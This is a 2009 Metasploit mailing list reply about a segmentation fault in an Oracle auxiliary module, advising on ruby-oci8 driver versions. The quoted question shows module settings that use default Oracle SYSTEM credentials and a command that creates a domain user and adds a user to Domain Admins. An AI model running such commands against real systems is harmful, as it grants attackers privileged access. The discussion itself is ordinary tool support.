Metasploit mailing list archives

Re: SEG FAULT while launching auxiliary


From: MC <mc () metasploit com>
Date: Fri, 4 Dec 2009 08:08:13 -0600 (CST)

you shouldn't need dbi anymore.. what version of ruby are you running?

from the wiki.

########################
# Install ruby-oci8-1.0.0  VERSION IS IMPORTANT!!
# http://rubyforge.org/projects/ruby-oci8/
# http://rubyforge.org/frs/download.php/28396/ruby-oci8-1.0.0.tar.gz
# If using ruby 1.9, grab this version of the oci8 driver.
# http://rubyforge.org/frs/download.php/65896/ruby-oci8-2.0.3.tar.gz
########################

~mc

On Fri, 4 Dec 2009, Giorgio Casali wrote:

Hi I was using the auxiliary admin/oracle/sql like this
use admin/oracle/post_exploitation/win32exec

set SID TEST
set DBUSER SYSTEM
set DBPASS MANAGER
set RHOST x.y.z.k
set CMD "net user haz0r pass111! /ADD /DOMAIN && net group Domain Admins h4ckm3 /ADD"

and I got SEG FAULT.

Might it be the oci or dbi driver ?




_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: